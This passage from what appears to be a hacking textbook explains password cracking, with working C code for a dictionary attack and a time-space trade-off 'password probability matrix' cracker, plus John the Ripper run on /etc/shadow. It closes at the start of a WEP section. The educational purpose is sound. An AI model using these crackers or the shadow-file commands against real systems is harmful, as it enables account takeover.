   printf(message, extra);
   exit(1);
}

/* A dictionary attack example program */
int main(int argc, char *argv[]) {
   FILE *wordlist;
   char *hash, word[30], salt[3];
   if(argc < 3)   // Both the wordlist and the hash are required.
      barf("Usage: %s <wordlist file> <password hash>\n", argv[0]);

   strncpy(salt, argv[2], 2); // First 2 bytes of hash are the salt.
   salt[2] = '\0';  // terminate string

   printf("Salt value is \'%s\'\n", salt);

   if( (wordlist = fopen(argv[1], "r")) == NULL) // Open the wordlist.
      barf("Fatal: couldn't open the file \'%s\'.\n", argv[1]);

   while(fgets(word, 30, wordlist) != NULL) { // Read each word
      word[strlen(word)-1] = '\0'; // Remove the '\n' byte at the end.
      hash = crypt(word, salt); // Hash the word using the salt.
      printf("trying word:   %-30s ==> %15s\n", word, hash);
      if(strcmp(hash, argv[2]) == 0) { // If the hash matches
         printf("The hash \"%s\" is from the ", argv[2]);
         printf("plaintext password \"%s\".\n", word);
         fclose(wordlist);
         exit(0);
      }
   }
   printf("Couldn't find the plaintext password in the supplied wordlist.\n");
   fclose(wordlist); 
}

The following output shows this program being used to crack the password hash jeHEAX1m66RV., using the words found in /usr/share/dict/words.

reader@hacking:~/booksrc $ gcc -o crypt_crack crypt_crack.c -lcrypt
reader@hacking:~/booksrc $ ./crypt_crack /usr/share/dict/words jeHEAX1m66RV.
Salt value is 'je'
trying word:                                  ==>   jesS3DmkteZYk
trying word:   A                              ==>   jeV7uK/S.y/KU
trying word:   A's                            ==>   jeEcn7sF7jwWU
trying word:   AOL                            ==>   jeSFGex8ANJDE
trying word:   AOL's                          ==>   jesSDhacNYUbc
trying word:   Aachen                         ==>   jeyQc3uB14q1E
trying word:   Aachen's                       ==>   je7AQSxfhvsyM
trying word:   Aaliyah                        ==>   je/vAqRJyOZvU

.:[ output trimmed ]:.

trying word:   terse                          ==>   jelgEmNGLflJ2
trying word:   tersely                        ==>   jeYfo1aImUWqg
trying word:   terseness                      ==>   jedH11z6kkEaA
trying word:   terseness's                    ==>   jedH11z6kkEaA
trying word:   terser                         ==>   jeXptBe6psF3g
trying word:   tersest                        ==>   jenhzylhDIqBA
trying word:   tertiary                       ==>   jex6uKY9AJDto
trying word:   test                           ==>   jeHEAX1m66RV.
The hash "jeHEAX1m66RV." is from the plaintext password "test". 
reader@hacking:~/booksrc $

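Since the word test was the original password and this word is found in the words file, the password hash will eventually be cracked. This is why it's considered poor security practice to use passwords that are dictionary words or based on dictionary words.

The downside to this attack is that if the original password isn't a word found in the dictionary file, the password won't be found. For example, if a non-dictionary word such as h4R% is used as a password, the dictionary attack won't be able to find it: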

reader@hacking:~/booksrc $ ./crypt_test h4R% je
password "h4R%" with salt "je" hashes to ==> jeMqqfIfPNNTE
reader@hacking:~/booksrc $ ./crypt_crack /usr/share/dict/words jeMqqfIfPNNTE
Salt value is 'je'
trying word:                                  ==>   jesS3DmkteZYk
trying word:   A                              ==>   jeV7uK/S.y/KU
trying word:   A's                            ==>   jeEcn7sF7jwWU
trying word:   AOL                            ==>   jeSFGex8ANJDE
trying word:   AOL's                          ==>   jesSDhacNYUbc
trying word:   Aachen                         ==>   jeyQc3uB14q1E
trying word:   Aachen's                       ==>   je7AQSxfhvsyM
trying word:   Aaliyah                        ==>   je/vAqRJyOZvU

.:[ output trimmed ]:.

trying word:   zooms                          ==>   je8A6DQ87wHHI
trying word:   zoos                           ==>   jePmCz9ZNPwKU
trying word:   zucchini                       ==>   jeqZ9LSWt.esI
trying word:   zucchini's                     ==>   jeqZ9LSWt.esI
trying word:   zucchinis                      ==>   jeqZ9LSWt.esI
trying word:   zwieback                       ==>   jezzR3b5zwlys
trying word:   zwieback's                     ==>   jezzR3b5zwlys
trying word:   zygote                         ==>   jei5HG7JrfLy6
trying word:   zygote's                       ==>   jej86M9AG0yj2
trying word:   zygotes                        ==>   jeWHQebUlxTmo 
Couldn't find the plaintext password in the supplied wordlist.

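Custom dictionary files are often made using different languages, standard modifications of words (such as transforming letters to numbers), or simply appending numbers to the end of each word. While a bigger dictionary will yield more passwords, it will also take more time to process.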

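Exhaustive Brute-Force Attacks

A dictionary attack that tries every single possible combination is an exhaustive brute-force attack. While this type of attack will technically be able to crack every conceivable password, it will probably take longer than your great-grandchildren's great-grandchildren would be willing to wait.

With 95 possible input characters for crypt()-style passwords, there are 95⁸ possible passwords for an exhaustive search of all eight-character passwords, which works out to about 6.6 quadrillion possible passwords. The number gets so big so quickly because, as another character is added to the password length, the number of possible passwords grows exponentially. Assuming 10,000 cracks per second, it would take about 21,000 years to try every password. Distributing this effort across many machines and processors is one possible approach; however, it is important to remember that this will only achieve a linear speedup. If one thousand machines were combined, each capable of 10,000 cracks per second, the effort would still take about 21 years. The linear speedup achieved by adding another machine is marginal compared to the growth in keyspace when another character is added to the password length.

Luckily, the inverse of the exponential growth is also true; as characters are removed from the password length, the number of possible passwords decreases exponentially. This means that a four-character password only has 95⁴ possible passwords. This keyspace has only about 81 million possible passwords, which can be exhaustively cracked (assuming 10,000 cracks per second) in a little over two hours. This means that, even though a password like h4R% isn't in any dictionary, it can be cracked in a reasonable amount of time.

This means that, in addition to avoiding dictionary words, password length is also important. Since the complexity scales up exponentially, doubling the length to produce an eight-character password should push the level of effort required to crack the password into the unreasonable time frame.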

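Solar Designer has developed a password-cracking program called John the Ripper that uses first a dictionary attack and then an exhaustive brute-force attack. This program is probably the most popular one of its kind; it is available at www.openwall.com/john. It has been included on the LiveCD.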

reader@hacking:~/booksrc $ john

John the Ripper  Version 1.6  Copyright (c) 1996-98 by Solar Designer

Usage: john [OPTIONS] [PASSWORD-FILES]
-single                   "single crack" mode
-wordfile:FILE -stdin     wordlist mode, read words from FILE or stdin
-rules                    enable rules for wordlist mode
-incremental[:MODE]       incremental mode [using section MODE]
-external:MODE            external mode or word filter
-stdout[:LENGTH]          no cracking, just write words to stdout
-restore[:FILE]           restore an interrupted session [from FILE]
-session:FILE             set session file name to FILE
-status[:FILE]            print status of a session [from FILE]
-makechars:FILE           make a charset, FILE will be overwritten
-show                     show cracked passwords
-test                     perform a benchmark
-users:[-]LOGIN|UID[,..]  load this (these) user(s) only
-groups:[-]GID[,..]       load users of this (these) group(s) only
-shells:[-]SHELL[,..]     load users with this (these) shell(s) only
-salts:[-]COUNT           load salts with at least COUNT passwords only
-format:NAME              force ciphertext format NAME (DES/BSDI/MD5/BF/AFS/LM)
-savemem:LEVEL            enable memory saving, at LEVEL 1..3
reader@hacking:~/booksrc $ sudo tail -3 /etc/shadow
matrix:$1$zCcRXVsm$GdpHxqC9epMrdQcayUx0//:13763:0:99999:7:::
jose:$1$pRS4.I8m$Zy5of8AtD800SeMgm.2Yg.:13786:0:99999:7:::
reader:U6aMy0wojraho:13764:0:99999:7:::
reader@hacking:~/booksrc $ sudo john /etc/shadow
Loaded 2 passwords with 2 different salts (FreeBSD MD5 [32/32])
guesses: 0  time: 0:00:00:01 0% (2)  c/s: 5522  trying: koko
guesses: 0  time: 0:00:00:03 6% (2)  c/s: 5489  trying: exports
guesses: 0  time: 0:00:00:05 10% (2)  c/s: 5561  trying: catcat
guesses: 0  time: 0:00:00:09 20% (2)  c/s: 5514  trying: dilbert!
guesses: 0  time: 0:00:00:10 22% (2)  c/s: 5513  trying: redrum3
testing7         (jose)
guesses: 1  time: 0:00:00:14 44% (2)  c/s: 5539  trying: KnightKnight
guesses: 1  time: 0:00:00:17 59% (2)  c/s: 5572  trying: Gofish! 
Session aborted

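In this output, the account jose is shown to have the password testing7.

Hash Lookup Table

Another interesting idea for password cracking is using a giant hash lookup table. If all the hashes for all possible passwords were precomputed and stored in a searchable data structure somewhere, any password could be cracked in the time it takes to search. Assuming a binary search, this time would be about O(log₂ N), where N is the number of entries. Since N is 95⁸ in the case of eight-character passwords, this works out to about O(8 log₂ 95), or roughly 53 comparisons, which is quite fast.

However, a hash lookup table like this would require about 100,000 terabytes of storage. In addition, the design of the password-hashing algorithm takes this type of attack into consideration and mitigates it with the salt value. Since the same plaintext password hashes to a different password hash with each salt, a separate lookup table would have to be created for each salt. With the DES-based crypt() function, there are 4,096 possible salt values, which means that even for a smaller keyspace, such as all possible four-character passwords, a hash lookup table becomes impractical. With a fixed salt, the storage space needed for a single lookup table for all possible four-character passwords is about one gigabyte, but because of the salt values, there are 4,096 possible hashes for a single plaintext password, necessitating 4,096 different tables. This raises the needed storage space to about 4.6 terabytes, which greatly dissuades such an attack.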

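Password Probability Matrix

There is a trade-off between computational power and storage space that exists everywhere. This can be seen in the most elementary forms of computer science and in everyday life. MP3 files use compression to store a high-quality sound file in a relatively small amount of space, but the demand for computational resources increases. Pocket calculators use this trade-off in the other direction by maintaining a lookup table for functions such as sine and cosine to save the calculator from doing heavy computations.

This trade-off can also be applied to cryptography in what has become known as a time/space trade-off attack. While Hellman's methods for this type of attack are probably more efficient, the following source code should be easier to understand. The general principle is always the same, though: try to find the sweet spot between computational power and storage space, so that an exhaustive brute-force attack can be completed in a reasonable amount of time, using a reasonable amount of space. Unfortunately, the dilemma of salts will still present itself, since this method still requires some form of storage. However, there are only 4,096 possible salts with crypt()-style password hashes, so the effect of this problem can be diminished by reducing the needed storage space far enough to remain reasonable despite the 4,096 multiplier.

This method uses a form of lossy compression. Instead of having an exact hash lookup table, tens of thousands of possible plaintext values will be returned when a password hash is entered. These values can be checked quickly to converge on the original plaintext password, and the lossy compression allows for a major space reduction. In the demonstration code that follows, the keyspace for all possible four-character passwords (with a fixed salt) is used. The storage space needed is reduced by 88 percent, compared to a full hash lookup table (with a fixed salt), and the keyspace that must be brute-forced through is reduced by about 1,018 times. Under the assumption of 10,000 cracks per second, this method can crack any four-character password (with a fixed salt) in under eight seconds, which is a considerable speedup when compared to the two hours needed for an exhaustive brute-force attack of the same keyspace.

This method builds a three-dimensional binary matrix that correlates parts of the hash values with parts of the plaintext values. On the x-axis, the plaintext is split into two pairs: the first two characters and the second two characters. The possible values are enumerated into a binary vector that is 95², or 9,025, bits long (about 1,129 bytes). On the y-axis, the ciphertext is split into four three-character chunks. These are enumerated the same way down the columns, but only two bits (four values) of the third character are actually used. This means there are 64² · 4, or 16,384, columns. The z-axis exists simply to maintain eight different two-dimensional matrices, so four exist for each of the plaintext pairs.

The basic idea is to split the plaintext into two paired values that are enumerated along a vector. Every possible plaintext is hashed into ciphertext, and the ciphertext is used to find the appropriate column of the matrix. Then the plaintext enumeration bit across the row of the matrix is turned on. When the ciphertext values are reduced into smaller chunks, collisions are inevitable.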

Plaintext	Hash
test	jeHEAX1m66RV.
!J)h	jeHEA38vqlkkQ
".F+	jeHEA1Tbde5FE
"8,J	jeHEAnX8kQK3I

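In this case, the column for HEA would have the bits corresponding to the plaintext pairs te, !J, "., and "8 turned on, as these plaintext/hash pairs are added to the matrix.

After the matrix is completely filled out, when a hash such as jeHEA38vqlkkQ is entered, the column for HEA will be looked up, and the two-dimensional matrix will return the values te, !J, "., and "8 for the first two characters of the plaintext. There are four matrices like this for the first two characters, using ciphertext substrings from characters 2 through 4, 4 through 6, 6 through 8, and 8 through 10, each with a different vector of possible first two-character plaintext values. Each vector is pulled, and they are combined with a bitwise AND. This will leave only those bits turned on that correspond to the plaintext pairs listed as possibilities for each substring of ciphertext. There are also four matrices like this for the last two characters of plaintext.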

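The sizes of the matrices were determined by the pigeonhole principle. This is a simple principle that states: if k + 1 objects are put into k boxes, at least one of the boxes will contain two objects. So, to get the best results, the goal is for each vector to be a little less than half full of 1s. Since 95⁴, or 81,450,625, entries will be put in the matrices, there need to be about twice as many holes to achieve 50 percent saturation. Since each vector has 9,025 entries, there should be about (95⁴ · 2) / 9025 columns. This works out to be about 18 thousand columns. Since ciphertext substrings of three characters are being used for the columns, the first two characters and two bits (four values) from the third character are used to provide 64² · 4, or about 16 thousand columns (there are only 64 possible values for each character of ciphertext hash). This should be close enough, because when a bit is added twice, the overlap is ignored. In practice, each vector turns out to be about 42 percent saturated with 1s.

Since four vectors are pulled for a single ciphertext, the probability of any one enumeration position having a 1 value in every vector is about 0.42⁴, or about 3.11 percent. This means that, on average, the 9,025 possibilities for the first two characters of plaintext are reduced by about 97 percent to 280 possibilities. This is also done for the last two characters, providing about 280², or 78,400, possible plaintext values. Under the assumption of 10,000 cracks per second, this reduced keyspace would take under 8 seconds to check.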

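Of course, there are downsides. First, it takes at least as long to create the matrix as the original brute-force attack would have taken; however, this is a one-time cost. Also, the salts still tend to prohibit any type of storage attack, even with the reduced storage-space requirements.

The following two source code listings can be used to create a password probability matrix and crack passwords with it. The first listing will generate a matrix that can be used to crack all possible four-character passwords salted with je. The second listing will use the generated matrix to actually do the password cracking.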

ppm_gen.c

/*********************************************************\
*  Password Probability Matrix   *    File: ppm_gen.c     *
***********************************************************
*                                                         *
*  Author:        Jon Erickson <matrix@phiral.com>        *
*  Organization:  Phiral Research Laboratories            *
*                                                         *
*  This is the generate program for the PPM proof of      *
*  concept.  It generates a file called 4char.ppm, which  *
*  contains information regarding all possible 4-         *
*  character passwords salted with 'je'.  This file can   *
*  be used to quickly crack passwords found within this   *
*  keyspace with the corresponding ppm_crack.c program.   *
*                                                         *
\*********************************************************/

#define _XOPEN_SOURCE
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

#define HEIGHT 16384
#define WIDTH  1129
#define DEPTH  8
#define SIZE HEIGHT * WIDTH * DEPTH

/* Map a single hash byte to an enumerated value. */
int enum_hashbyte(char a) {
   int i, j;
   i = (int)a;
   if((i >= 46) && (i <= 57))
      j = i - 46;
   else if ((i >= 65) && (i <= 90))
      j = i - 53;
   else if ((i >= 97) && (i <= 122))
      j = i - 59;
   return j;
}

/* Map 3 hash bytes to an enumerated value. */
int enum_hashtriplet(char a, char b, char c) {
   return (((enum_hashbyte(c)%4)*4096)+(enum_hashbyte(a)*64)+enum_hashbyte(b));
}
/* Barf a message and exit. */
void barf(char *message, char *extra) {
   printf(message, extra);
   exit(1);
}

/* Generate a 4-char.ppm file with all possible 4-char passwords (salted w/ je). */
int main() {
   char plain[5];
   char *code, *data;
   int i, j, k, l;
   unsigned int charval, val;
   FILE *handle;
   if (!(handle = fopen("4char.ppm", "w")))
      barf("Error: Couldn't open file '4char.ppm' for writing.\n", NULL);

   data = (char *) calloc(SIZE, 1); // Zero-filled, since bits are only ever ORed in.
   if (!(data))
      barf("Error: Couldn't allocate memory.\n", NULL);

   for(i=32; i<127; i++) {
      for(j=32; j<127; j++) {
         printf("Adding %c%c** to 4char.ppm..\n", i, j);
         for(k=32; k<127; k++) {
            for(l=32; l<127; l++) {

               plain[0]  = (char)i; // Build every
               plain[1]  = (char)j; // possible 4-byte
               plain[2]  = (char)k; // password.
               plain[3]  = (char)l;
               plain[4]  = '\0';
               code = crypt((const char *)plain, (const char *)"je"); // Hash it.

               /* Lossfully store statistical info about the pairings. */
               val = enum_hashtriplet(code[2], code[3], code[4]); // Store info about bytes 2-4.

               charval = (i-32)*95 + (j-32); // First 2 plaintext bytes
               data[(val*WIDTH)+(charval/8)] |=  (1<<(charval%8));
               val += (HEIGHT * 4);
               charval = (k-32)*95 + (l-32); // Last 2 plaintext bytes
               data[(val*WIDTH)+(charval/8)] |=  (1<<(charval%8));

               val = HEIGHT + enum_hashtriplet(code[4], code[5], code[6]); // bytes 4-6
               charval = (i-32)*95 + (j-32); // First 2 plaintext bytes
               data[(val*WIDTH)+(charval/8)] |=  (1<<(charval%8));
               val += (HEIGHT * 4);
               charval = (k-32)*95 + (l-32); // Last 2 plaintext bytes
               data[(val*WIDTH)+(charval/8)] |=  (1<<(charval%8));

               val = (2 * HEIGHT) + enum_hashtriplet(code[6], code[7], code[8]); // bytes 6-8
               charval = (i-32)*95 + (j-32); // First 2 plaintext bytes
               data[(val*WIDTH)+(charval/8)] |=  (1<<(charval%8));
               val += (HEIGHT * 4);
               charval = (k-32)*95 + (l-32); // Last 2 plaintext bytes
               data[(val*WIDTH)+(charval/8)] |=  (1<<(charval%8));

               val = (3 * HEIGHT) + enum_hashtriplet(code[8], code[9], code[10]); // bytes 8-10
               charval = (i-32)*95 + (j-32); // First 2 plaintext chars
               data[(val*WIDTH)+(charval/8)] |=  (1<<(charval%8));
               val += (HEIGHT * 4);
               charval = (k-32)*95 + (l-32); // Last 2 plaintext bytes
               data[(val*WIDTH)+(charval/8)] |=  (1<<(charval%8));
            }
         }
      }
   }
   printf("finished.. saving..\n");
   fwrite(data, SIZE, 1, handle);
   free(data);
   fclose(handle); 
}

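The first piece of code, ppm_gen.c, can be used to generate a four-character password probability matrix, as shown in the output below. The -O3 option passed to GCC tells it to optimize the code for speed when it compiles.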

reader@hacking:~/booksrc $ gcc -O3 -o ppm_gen ppm_gen.c -lcrypt
reader@hacking:~/booksrc $ ./ppm_gen
Adding   ** to 4char.ppm..
Adding  !** to 4char.ppm..
Adding  "** to 4char.ppm..

.:[ output trimmed ]:.

Adding ~|** to 4char.ppm..
Adding ~}** to 4char.ppm..
Adding ~~** to 4char.ppm..
finished.. saving..
reader@hacking:~/booksrc $ ls -lh 4char.ppm
-rw-r--r-- 1 142M 2007-09-30 13:56 4char.ppm
reader@hacking:~/booksrc $

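The 142MB 4char.ppm file contains loose associations between the plaintext and hash data for every possible four-character password. This data can then be used by the next program to quickly crack four-character passwords that would foil a dictionary attack.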

ppm_crack.c

/*********************************************************\
*  Password Probability Matrix   *    File: ppm_crack.c   *
***********************************************************
*                                                         *
*  Author:        Jon Erickson <matrix@phiral.com>        *
*  Organization:  Phiral Research Laboratories            *
*                                                         *
*  This is the crack program for the PPM proof of concept.*
*  It uses an existing file called 4char.ppm, which       *
*  contains information regarding all possible 4-         *
*  character passwords salted with 'je'.  This file can   *
*  be generated with the corresponding ppm_gen.c program. *
*                                                         *
\*********************************************************/

#define _XOPEN_SOURCE
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   // strcmp()

#define HEIGHT 16384
#define WIDTH  1129
#define DEPTH 8
#define SIZE HEIGHT * WIDTH * DEPTH
#define DCM HEIGHT * WIDTH

/* Map a single hash byte to an enumerated value. */
int enum_hashbyte(char a) {
   int i, j;
   i = (int)a;
   if((i >= 46) && (i <= 57))
      j = i - 46;
   else if ((i >= 65) && (i <= 90))
      j = i - 53;
   else if ((i >= 97) && (i <= 122))
      j = i - 59;
   return j;
}

/* Map 3 hash bytes to an enumerated value. */
int enum_hashtriplet(char a, char b, char c) {
   return (((enum_hashbyte(c)%4)*4096)+(enum_hashbyte(a)*64)+enum_hashbyte(b));
}

/* Merge two vectors. */
void merge(char *vector1, char *vector2) {
   int i;
   for(i=0; i < WIDTH; i++)
      vector1[i] &= vector2[i];
}

/* Returns the bit in the vector at the passed index position */
int get_vector_bit(char *vector, int index) {
   return ((vector[(index/8)]&(1<<(index%8)))>>(index%8));
}

/* Counts the number of plaintext pairs in the passed vector */
int count_vector_bits(char *vector) {
   int i, count=0;
   for(i=0; i < 9025; i++)
      count += get_vector_bit(vector, i);
   return count;
}

/* Print the plaintext pairs that each ON bit in the vector enumerates. */
void print_vector(char *vector) {
   int i, a, b, val;
   for(i=0; i < 9025; i++) {
      if(get_vector_bit(vector, i) == 1) { // If bit is on,
         a = i / 95;                  // calculate the
         b = i - (a * 95);            // plaintext pair
         printf("%c%c ",a+32, b+32);  // and print it.
      }
   }
   printf("\n");
}

/* Barf a message and exit. */
void barf(char *message, char *extra) {
   printf(message, extra);
   exit(1);
}

/* Crack a 4-character password using generated 4char.ppm file. */
int main(int argc, char *argv[]) {
  char *pass, plain[5];
  unsigned char bin_vector1[WIDTH], bin_vector2[WIDTH], temp_vector[WIDTH];
  char prob_vector1[2][9025];
  char prob_vector2[2][9025];
  int a, b, i, j, len, pv1_len=0, pv2_len=0;
  FILE *fd;

  if(argc < 2)   // The password hash argument is required.
     barf("Usage: %s <password hash>  (will use the file 4char.ppm)\n", argv[0]);

  if(!(fd = fopen("4char.ppm", "r")))
     barf("Fatal: Couldn't open PPM file for reading.\n", NULL);

  pass = argv[1]; // First argument is password hash

  printf("Filtering possible plaintext bytes for the first two characters:\n");

  fseek(fd,(DCM*0)+enum_hashtriplet(pass[2], pass[3], pass[4])*WIDTH, SEEK_SET);
  fread(bin_vector1, WIDTH, 1, fd); // Read the vector associating bytes 2-4 of hash.

  len = count_vector_bits(bin_vector1);
  printf("only 1 vector of 4:\t%d plaintext pairs, with %0.2f%% saturation\n", len, len*100.0/9025.0);

  fseek(fd,(DCM*1)+enum_hashtriplet(pass[4], pass[5], pass[6])*WIDTH, SEEK_SET);
  fread(temp_vector, WIDTH, 1, fd); // Read the vector associating bytes 4-6 of hash.
  merge(bin_vector1, temp_vector);  // Merge it with the first vector.

  len = count_vector_bits(bin_vector1);
  printf("vectors 1 AND 2 merged:\t%d plaintext pairs, with %0.2f%% saturation\n", len, 
len*100.0/9025.0);

  fseek(fd,(DCM*2)+enum_hashtriplet(pass[6], pass[7], pass[8])*WIDTH, SEEK_SET);
  fread(temp_vector, WIDTH, 1, fd); // Read the vector associating bytes 6-8 of hash.
  merge(bin_vector1, temp_vector);  // Merge it with the first two vectors.

  len = count_vector_bits(bin_vector1);
  printf("first 3 vectors merged:\t%d plaintext pairs, with %0.2f%% saturation\n", len, 
len*100.0/9025.0);

  fseek(fd,(DCM*3)+enum_hashtriplet(pass[8], pass[9],pass[10])*WIDTH, SEEK_SET);
  fread(temp_vector, WIDTH, 1, fd); // Read the vector associating bytes 8-10 of hash.
  merge(bin_vector1, temp_vector);  // Merge it with the other vectors.

  len = count_vector_bits(bin_vector1);
  printf("all 4 vectors merged:\t%d plaintext pairs, with %0.2f%% saturation\n", len, 
len*100.0/9025.0);

  printf("Possible plaintext pairs for the first two bytes:\n");
  print_vector(bin_vector1);

  printf("\nFiltering possible plaintext bytes for the last two characters:\n");

  fseek(fd,(DCM*4)+enum_hashtriplet(pass[2], pass[3], pass[4])*WIDTH, SEEK_SET);
  fread(bin_vector2, WIDTH, 1, fd); // Read the vector associating bytes 2-4 of hash.

  len = count_vector_bits(bin_vector2);
  printf("only 1 vector of 4:\t%d plaintext pairs, with %0.2f%% saturation\n", len, len*100.0/9025.0);

  fseek(fd,(DCM*5)+enum_hashtriplet(pass[4], pass[5], pass[6])*WIDTH, SEEK_SET);
  fread(temp_vector, WIDTH, 1, fd); // Read the vector associating bytes 4-6 of hash.
  merge(bin_vector2, temp_vector);  // Merge it with the first vector.

  len = count_vector_bits(bin_vector2);
  printf("vectors 1 AND 2 merged:\t%d plaintext pairs, with %0.2f%% saturation\n", len, 
len*100.0/9025.0);

  fseek(fd,(DCM*6)+enum_hashtriplet(pass[6], pass[7], pass[8])*WIDTH, SEEK_SET);
  fread(temp_vector, WIDTH, 1, fd); // Read the vector associating bytes 6-8 of hash.
  merge(bin_vector2, temp_vector);  // Merge it with the first two vectors.

  len = count_vector_bits(bin_vector2);
  printf("first 3 vectors merged:\t%d plaintext pairs, with %0.2f%% saturation\n", len, 
len*100.0/9025.0);

  fseek(fd,(DCM*7)+enum_hashtriplet(pass[8], pass[9],pass[10])*WIDTH, SEEK_SET);
  fread(temp_vector, WIDTH, 1, fd); // Read the vector associating bytes 8-10 of hash.
  merge(bin_vector2, temp_vector);  // Merge it with the other vectors.

  len = count_vector_bits(bin_vector2);
  printf("all 4 vectors merged:\t%d plaintext pairs, with %0.2f%% saturation\n", len, 
len*100.0/9025.0);

  printf("Possible plaintext pairs for the last two bytes:\n");
  print_vector(bin_vector2);
  printf("Building probability vectors...\n");
  for(i=0; i < 9025; i++) { // Find possible first two plaintext bytes.
    if(get_vector_bit(bin_vector1, i)==1) {
      prob_vector1[0][pv1_len] = i / 95;
      prob_vector1[1][pv1_len] = i - (prob_vector1[0][pv1_len] * 95);
      pv1_len++;
    }
  }
  for(i=0; i < 9025; i++) { // Find possible last two plaintext bytes.
    if(get_vector_bit(bin_vector2, i)) {
      prob_vector2[0][pv2_len] = i / 95;
      prob_vector2[1][pv2_len] = i - (prob_vector2[0][pv2_len] * 95);
      pv2_len++;
    }
  }

  printf("Cracking remaining %d possibilites..\n", pv1_len*pv2_len);
  for(i=0; i < pv1_len; i++) {
    for(j=0; j < pv2_len; j++) {
      plain[0] = prob_vector1[0][i] + 32;
      plain[1] = prob_vector1[1][i] + 32;
      plain[2] = prob_vector2[0][j] + 32;
      plain[3] = prob_vector2[1][j] + 32;
      plain[4] = 0;
      if(strcmp(crypt(plain, "je"), pass) == 0) {
        printf("Password :  %s\n", plain);
        i = 31337;
        j = 31337;
      }
    }
  }
  if(i < 31337)
    printf("Password wasn't salted with 'je' or is not 4 chars long.\n");

  fclose(fd); 
}

The second piece of code, ppm_crack.c, can be used to crack the troublesome password of h4R% in a matter of seconds:

reader@hacking:~/booksrc $ ./crypt_test h4R% je
password "h4R%" with salt "je" hashes to ==> jeMqqfIfPNNTE
reader@hacking:~/booksrc $ gcc -O3 -o ppm_crack ppm_crack.c -lcrypt
reader@hacking:~/booksrc $ ./ppm_crack jeMqqfIfPNNTE
Filtering possible plaintext bytes for the first two characters:
only 1 vector of 4:     3801 plaintext pairs, with 42.12% saturation
vectors 1 AND 2 merged: 1666 plaintext pairs, with 18.46% saturation
first 3 vectors merged: 695 plaintext pairs, with 7.70% saturation
all 4 vectors merged:   287 plaintext pairs, with 3.18% saturation
Possible plaintext pairs for the first two bytes:
 4  9  N !& !M !Q "/ "5 "W #K #d #g #p $K $O $s %) %Z %\ %r &( &T '- '0 '7 'D
'F (  (v (| )+ ). )E )W *c *p *q *t *x +C -5 -A -[ -a .% .D .S .f /t 02 07 0? 
0e 0{ 0| 1A 1U 1V 1Z 1d 2V 2e 2q 3P 3a 3k 3m 4E 4M 4P 4X 4f 6  6, 6C 7: 7@ 7S 
7z 8F 8H 9R 9U 9_ 9~ :- :q :s ;G ;J ;Z ;k <! <8 =! =3 =H =L =N =Y >V >X ?1 @#
@W @v @| AO B/ B0 BO Bz C( D8 D> E8 EZ F@ G& G? Gj Gy H4 I@ J  JN JT JU Jh Jq 
Ks Ku M) M{ N, N: NC NF NQ Ny O/ O[ P9 Pc Q! QA Qi Qv RA Sg Sv T0 Te U& U> UO 
VT V[ V] Vc Vg Vi W: WG X" X6 XZ X` Xp YT YV Y^ Yl Yy Y{ Za $ [* [9 [m [z \" \
+ \C \O \w  }+ }? }y ~L ~m 

Filtering possible plaintext bytes for the last two characters:
only 1 vector of 4:     3821 plaintext pairs, with 42.34% saturation
vectors 1 AND 2 merged: 1677 plaintext pairs, with 18.58% saturation
first 3 vectors merged: 713 plaintext pairs, with 7.90% saturation
all 4 vectors merged:   297 plaintext pairs, with 3.29% saturation
Possible plaintext pairs for the last two bytes:
 !  & != !H !I !K !P !X !o !~ "r "{ "} #% #0 $5 $] %K %M %T &" &% &( &0 &4 &I 
&q &} 'B 'Q 'd )j )w *I *] *e *j *k *o *w *| +B +W ,' ,J ,V -z .  .$ .T /' /_ 
0Y 0i 0s 1! 1= 1l 1v 2- 2/ 2g 2k 3n 4K 4Y 4\ 4y 5- 5M 5O 5} 6+ 62 6E 6j 7* 74 
8E 9Q 9\ 9a 9b :8 :; :A :H :S :w ;" ;& ;L <L <m <r <u =, =4 =v >v >x ?& ?` ?j 
?w @0 A* B  B@ BT C8 CF CJ CN C} D+ D? DK Dc EM EQ FZ GO GR H) Hj I: I> J( J+ 
J3 J6 Jm K# K) K@ L, L1 LT N* NW N` O= O[ Ot P: P\ Ps Q- Qa R% RJ RS S3 Sa T! 
T$ T@ TR T_ Th U" U1 V* V{ W3 Wy Wz X% X* Y* Y? Yw Z7 Za Zh Zi Zm [F \( \3 \5 \
_ \a \b \| ]$ ]. ]2 ]? ]d ^ ^~ `1 `F `f `y a8 a= aI aK az b, b- bS bz c( cg dB 
e, eF eJ eK eu fT fW fo g( g> gW g\ h$ h9 h: h@ hk i? jN ji jn k= kj l7 lo m< 
m= mT me m| m} n% n? n~ o  oF oG oM p" p9 p\ q} r6 r= rB sA sN s{ s~ tX tp u  
u2 uQ uU uk v# vG vV vW vl w* w> wD wv x2 xA y: y= y? yM yU yX zK zv {# {) {= 
{O {m |I |Z }. }; }d ~+ ~C ~a 
Building probability vectors...
Cracking remaining 85239 possibilites..
Password :  h4R%
reader@hacking:~/booksrc $

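These programs are proof-of-concept hacks that take advantage of the bit diffusion provided by hash functions. There are other time-space trade-off attacks, and some have become quite popular. RainbowCrack is a popular tool that supports multiple algorithms. If you want to learn more, consult the Internet.

Wireless 802.11b Encryption

Wireless 802.11b security has been a big issue, primarily due to the absence of it. Weaknesses in Wired Equivalent Privacy (WEP), the encryption method used for wireless, contribute greatly to the overall insecurity. There are other details, sometimes ignored during wireless deployments, that can also lead to major vulnerabilities.

The fact that wireless networks exist on layer 2 is one of these details. If the wireless network isn't VLANed off or firewalled, an attacker associated with the wireless access point could redirect all the wired network traffic out over the wireless via ARP redirection. This, coupled with the tendency to hook wireless access points to internal private networks, can lead to some serious vulnerabilities.

Of course, if WEP is turned on, only clients with the proper WEP key will be allowed to associate with the access point. If WEP is secure, there shouldn't be any concern about rogue attackers associating and causing havoc. This raises the question, "How secure is WEP?"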

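Wired Equivalent Privacy

WEP was meant to be an encryption method that provides security equivalent to a wired access point. It was originally designed with 40-bit keys; later, WEP2 came along to increase the key size to 104 bits. All of the encryption is done on a per-packet basis, so each packet is essentially a separate plaintext message to send. The packet will be called M.

First, a checksum of message M is computed, so the message integrity can be checked later. This is done using a 32-bit cyclic redundancy checksum function aptly named CRC32. This checksum will be called CS, so CS = CRC32(M). This value is appended to the end of the message, which makes up the plaintext message P:

Figure 0x700-2.

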